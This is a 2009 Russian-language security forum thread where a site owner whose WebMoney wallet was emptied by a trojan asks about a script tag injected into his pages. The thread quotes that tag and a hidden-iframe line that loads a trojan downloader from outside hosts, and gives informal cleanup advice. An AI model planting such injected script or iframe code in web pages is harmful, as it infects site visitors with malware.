Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Безопасность (https://forum.antichat.xyz/forumdisplay.php?f=41)
-   -   Что это за скрипт? (https://forum.antichat.xyz/showthread.php?t=138881)

LeRick 02.09.2009 01:49
Что это за скрипт?
 
На днях у меня "похозяйничал" троян... Увели 3 бакса с webmoney. Вроде бы всё почистил. Но вчера заметил, что на всех моих сайтах в конце всех страниц index или main появился такой код
Код:
<script src=http://flo4.cn/1.txt></script>
По адресу flo4.cn/1.txt соответственно находится такой скрипт:
Код:
document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5' style='display: none;'></iframe>");
Я понимаю, что попало это туда скорее всего через Тотал Коммандер. Пароли к фтп все храню там (знаю, что небезопасно, но ничего ценного в тех сайтах нет).
Интересно, что происходит при срабатывании этого скрипта в конечном итоге?

bloodAngel 02.09.2009 02:07
Цитата:
Сообщение от LeRick
На днях у меня "похозяйничал" троян... Увели 3 бакса с webmoney. Вроде бы всё почистил. Но вчера заметил, что на всех моих сайтах в конце всех страниц index или main появился такой код
Код:
<script src=http://flo4.cn/1.txt></script>
По адресу flo4.cn/1.txt соответственно находится такой скрипт:
Код:
document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5' style='display: none;'></iframe>");
Я понимаю, что попало это туда скорее всего через Тотал Коммандер. Пароли к фтп все храню там (знаю, что небезопасно, но ничего ценного в тех сайтах нет).
Интересно, что происходит при срабатывании этого скрипта в конечном итоге?
во первых- почисть host -папочку !! во вторых я думаю что сам панимаеш что ето значит document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5 !!! посмотри host файлы - там наверника что то левое !!((

bloodAngel 02.09.2009 08:41
LeRick - а вопше то юзай поиском по iframe ! http://forum.antichat.ru/search.php?searchid=5058055&pp=25&page=1

Fuckel 02.09.2009 10:09
в этом айфрейме подгрузчик трояна

X-3 02.09.2009 17:35
У меня вопрос: а как смогли с WebMoney баки потянуть?
Возможно, троян - всего лишь маскировка?

LeRick 02.09.2009 20:18
Цитата:
Сообщение от X-3
У меня вопрос: а как смогли с WebMoney баки потянуть?
Возможно, троян - всего лишь маскировка?
Не знаю, я ж не специалист:)
Кипер на компе был онлайн. WMZ перевели через обменник на яндекс-деньги. Возможно, меня не было за компом в это время. Не помню. Увидел позже сообщение об авторизации и пустой вмз кошелек. WMR не тронули, хотя там больше было, чем на вмз. У меня в настройках была включена возможность совершения операций через кипер-мини. Скорее всего этим и воспользовались...
После этого я отключил использование кипер-мини, сменил пароль, сделал новый файл ключей и установил активацию через телефон, а не через мэйл. А через пару дней получаю смску с кодом для активации кипера на другом компе. Видимо, опять пытались забраться в кошелек :)

bloodAngel 02.09.2009 20:54
Цитата:
Сообщение от LeRick
Не знаю, я ж не специалист:)
Кипер на компе был онлайн. WMZ перевели через обменник на яндекс-деньги. Возможно, меня не было за компом в это время. Не помню. Увидел позже сообщение об авторизации и пустой вмз кошелек. WMR не тронули, хотя там больше было, чем на вмз. У меня в настройках была включена возможность совершения операций через кипер-мини. Скорее всего этим и воспользовались...
После этого я отключил использование кипер-мини, сменил пароль, сделал новый файл ключей и установил активацию через телефон, а не через мэйл. А через пару дней получаю смску с кодом для активации кипера на другом компе. Видимо, опять пытались забраться в кошелек :)
кажетсо шо у тебя бекдор !встанови фаэрвол !! )))

LeRick 02.09.2009 22:22
Фаервол стоял. Комодо. Вчера снес его и поставил старый добрый Аутпост:)
Зашел на страничку с таким ифреймом и Аутпост сразу доложил об подозрительных действиях. В папку Windows/Temp загружается файл экзешный и пытается изменить explorer.exe и еще парочку прог винды.
Больше ничего подозрительного не замечал. Сегодня с утра проверил полностью комп антивирусом и воспользовался помощью на сайте virusinfo. Сказали, что в логах, которые я им отослал, ничего подозрительного нет.

X-3 03.09.2009 12:39
У меня даже уведомление об ответе в этой теме антивирус на почту не пропускает.

"Держите штаны крепче, господа" (с)

spider-intruder 03.09.2009 12:53
Читайте отчет. Оттуда и связку можно дернуть и малвару их пореверсить :)
http://wepawet.iseclab.org/view.php?hash=d91da88baf6ef98f1c3552742ff66a76&t=1 251968690&type=js


Время: 02:50